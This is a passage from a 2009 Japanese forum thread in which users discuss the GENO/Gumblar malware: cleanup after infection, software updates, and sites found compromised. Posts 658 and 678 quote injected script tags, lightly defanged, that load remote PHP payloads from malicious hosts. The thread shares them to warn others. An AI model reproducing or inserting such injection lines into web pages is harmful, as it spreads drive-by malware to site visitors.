リストアする際にレジストリを復元しない限り不活性化されたまんまHDDに残るんでないかい?

647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 08:13:05 ]
>>583
おれもWindows7で同じような状態になっちゃったんだけど、それGENOウィルスじゃないかもしれない
もしかしてWindowsの方のセキュリティにあるアクセス許可、AdministratorsとかSYSTEMとかを変えたりしなかった?

648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:41:38 ]
>>646
不活性化されたまんまHDDに残るを詳しく頼む

649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:53:48 ]
そのまんまだよ
動かないけどファイルは残ってるってこと



650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 18:08:37 ]
バックアップデータをリカバリしたパソコンに戻しても大丈夫だが、
もしかしたら攻撃の痕跡が残ってるファイルがあるかもなってことだ

651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 23:35:48 ]
でもレジストリまでそのままリストアしたらアウトってこと
レジストリ内にGENOを起動させる設定があるからね
きちんと修正したレジストリならば戻しても大丈夫じゃないかな

652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:29:50 ]
レジストリをいじるプログラムなんかをその感染後にバックアップした中から
また入れなおすときには要注意ってことかなるほど

653 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:36:33 ]
レジストリいじるのって、簡単に言うなら例えばexe系プログラム等だもんな。
画像ファイルやテキストワードファイルや音楽ファイルなんかは
それ自体はレジストリいじるのはあまりないだろうし、
それらを動かす為のプログラムは新しくダウンしてインスコなりすれば問題なさそうだな。
詳しい人には散々既出かもしれないが、大分色々わかってきてとても有難い。

654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:48:59 ]
ほんとにわかってるのかすごく心配になる文章だな
つーか何を言いたいのか1回読んだだけじゃまったく理解できん

とりあえず1行目のは実行ファイルっていえばいいんじゃね

655 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:58:58 ]
実行ファイルじゃなくてレジストリに設定を保存するソフトウェアのようなことを言ってるのかな
やっと解読できた

Genoの場合もそうだけどウイルスはドライバとしてロードされる部分に
埋め込まれることが多いからちょっと違う場所なんだけどね
まあレジストリは下手にいじると本当に危ないんで注意してください

656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 10:00:18 ]
//404の中身が変わって、有害化してるらしい。
中にはLocationヘッドで違うページに転送してそこに難読化したスクリプトが置いてあるのもある。

657 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 14:13:21 ]
>>656 のとおり、
一時期無害化されていたGumblar.xが攻撃再開。ご注意を。

658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 08:54:42 ]
こんなの貼られてた
Hは半角小文字、前後のスペースなし
●は.で

</head>

<script src= H ttp://christinateatern●se/images/kartachristina●jpg-for-web-small●php ></script><body>

659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 16:41:42 ]
Google Chormeでのweb巡回でもGENO対策になりますか・・・

横レススマソ



660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:12:22 ]
いいえ
どこが横レスなのかわからん

Google Safe Brwosingで既知の危険サイトはブロックするかもしれないけど
新型感染サイトはブロックされない可能性がある

まずは各種ソフトウェアの更新をしっかりやってください

661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:25:48 ]
ソフトウェアの更新については>>359あたり参照
今のところ直接関係はないけどJavaランタイムはVersion 6 Update 17が最新

662 名前:名無しさん@お腹いっぱい。 [2009/11/08(日) 13:15:38 ]
Javaランタイムのバージョン確認方法は

663 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 14:00:58 ]
>>662
サイトくらい見ればいいのに
www.java.com/ja/download/installed.jsp

あと設定→コントロールパネル→Java→
基本タブにあるバージョン情報ボタンクリック

664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 21:01:02 ]
バージョンすら確認出来ないのにネットやってて大丈夫なのかよw

665 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 18:28:40 ]
あったりまえじゃん! ぜーんぜんへーきさ

666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 19:30:54 ]
立命館大学の学園祭HPが感染したってマジか?

667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 20:56:59 ]
>>666
貴方↓の中の人ですか?
ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/
Gumblar.xですか。
ソースチェカー
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.rits-fes-by-e2.net%2F&hua=
Googleから行くと弾かれますね。

立命館大学衣笠学園祭事務局 問い合わせ
ttp://www.rits-fes.net/mail/index.html
TEL/FAX:075-465-7891

電話で教えて差し上げましたが対応が最悪です。
挙句の果てに電話を切られました。もうね、アホかとw

668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:06:39 ]
うほwwwwwがっつり感染しとるwww

669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:12:18 ]
>>667
今行くと404が出るからやっと対応したのかな?
でも今日の時点でアクセスカウンターが3万行ってたんだから
きちんと経緯とかを説明して欲しいね



670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:39:18 ]
中の人ならいまさらマジかっていわないだろwww

671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:51:07 ]
【セキュリティ】マルウェア「Gumblar」のホーム・ドメインが復活 (09/11/09)
pc11.2ch.net/test/read.cgi/pcnews/1257767416/

672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 23:21:36 ]
>>671
難しくてわからない
3行にまとめて下さい

673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 18:53:13 ]
ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=%E7%AB%8B%E5%91%BD%E9%A4%A8%E5%A4%A7%E5%AD%A6BKC%E5%AD%A6%E5%9C%92%E7%A5%AD%E4%BA%8B%E5%8B%99%E5%B1%80+077-561-3990&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
立命館大学BKC学園祭事務局 TEL:077-561-3990

に電話をしたところ、話の途中でFAX回線に切り替えられましたw
ピーピロピロピーってorz

[PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題
ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf
カタカナ英語使えばいいってもんじゃないっしょww

674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 20:14:45 ]
関西の大学に常識的な対応を期待するなよ

675 名前:名無しさん@お腹いっぱい。 [2009/11/13(金) 16:15:20 ]
majormess.nlってのもGENOの亜種ですか?
またクロームで警告あったんですが・・

676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:32:49 ]
今回のGumblarは感染した別サイトにウイルス置いてばらまかせる仕様だし、被害者兼加害者かも?

677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:52:16 ]
そこからさらに亜種も派生してさらに蔓延すると
今回はLoveLetter以来のかなり悪質なものだね

678 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 15:17:39 ]
巻き込み規制喰らってるので携帯からorz

http://www●interq●or●jp/
Redirectにコードが仕込んであるっぽい
--
<meta http-equiv="refresh" CONTENT="0;URL=http://members●interq●or●jp/">
</head>
<script src=http://ykcv●org/upload_data/blogslideconf/hvkh●php ></script><body>
--
http://ykcv●org/upload_data/blogslideconf/hvkh●php

http://forgottenchild●in/fieldtrips/shareyourlove●php

業種的にやばすぎるというか
終わってるだろ・・・

679 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 16:56:08 ]
>>678
今ソース見てきたけど、直ってね?



680 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 17:38:53 ]
>>678

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん
ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html

404も改ざんされてたらしいけど、今はどうなんだろ?

681 名前:679 [2009/11/14(土) 18:33:50 ]
ありゃ、>>678のソースが復活してら。駄目だねこりゃ。

682 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 18:44:30 ]
Welcome to Oriental Tunes

Dear Visitor

You have requested a page or file that does not exist on the site you came from.
You can proceed to Oriental Tunes and look for that file on our site.

683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 00:08:40 ]
ISPのシス管感染ワロス
自社オプションサービスのウィルスチェックしてみればいいのにね

684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:01:02 ]
さすがは悪名高いinterQ・・・

685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:24:28 ]
修正→改竄→再修正→再改竄→再々修正→再々改竄→再々再修正・・・
無限ループすんなよwww

interQ\(^o^)/オワタ

686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 03:07:43 ]
無限ループしてる=シス管がGumblarの対処法を知らない

いくら何でも致命的すぎないか……?

687 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 06:59:43 ]
セーフ ブラウジング
interq.or.jp の診断ページ
www.google.com/safebrowsing/diagnostic?site=http://interq.or.jp&hl=ja
不正なソフトウェアは uco-squad●com/, jgreenjewelers●net/, velassin●com/ を含む 3 個のドメインでホストされています。

AS7506 (INTERQ).
www.google.com/safebrowsing/diagnostic?site=AS:7506&hl=ja

※コメントは省略す(苦笑


688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 08:11:16 ]
interqなんてDQNしか使わないよ
よって影響なし






[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<157KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef